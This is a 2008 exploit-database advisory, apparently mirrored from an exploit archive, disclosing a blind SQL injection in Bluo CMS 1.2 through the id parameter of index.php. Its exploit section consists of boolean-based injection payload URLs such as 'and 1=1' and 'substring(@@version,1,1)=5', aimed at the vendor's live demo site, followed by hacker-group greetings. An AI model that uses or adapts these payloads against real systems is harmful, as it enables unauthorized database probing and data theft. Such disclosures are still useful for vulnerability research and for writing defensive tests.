[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Bluo CMS 1.2 (index.php id) Blind SQL Injection Vulnerability
# Published : 2008-11-28
# Author : The_5p3ctrum
# Previous Title : SailPlanner 0.3a (Auth Bypass) SQL Injection Vulnerability
# Next Title : CMS little (index.php term) Remote SQL Injection Exploit
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+
Bluo cms 1.2 blind sql injection Vulnerability +
+
Discovered by : The_5p3ctrum +
Contact AUTHOR: sp3[at]linuxmail.org & 5p[at]linuxmail.org + +
+
Mor0ccan Nightmares +
+
+
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
#####################################################
APPLICATION : bluocms
DOWNLOAD(299 $): http://www.bluocms.com/shop.php
VENDOR : http://www.bluocms.com
DEMO : http://www.bluocms.com/demo
#####################################################
[+] vuln : blind sql injection
[+] Exploit :
true:
http://www.bluocms.com/demo/index.php?id=511 and substring(@@version,1,1)=5
http://www.bluocms.com/demo/index.php?id=511 and 1=1
false:
http://www.bluocms.com/demo/index.php?id=511 and substring(@@version,1,1)=4
http://www.bluocms.com/demo/index.php?id=511 and 1=2
##########################################################################################################
#
# Greetings: str0ke, BayHay, Cyber-Zone, Drackanz, The_leo, The_Casper, Fucker_Net, And All my friends #
#
##########################################################################################################
# www.Syue.com [2008-11-28]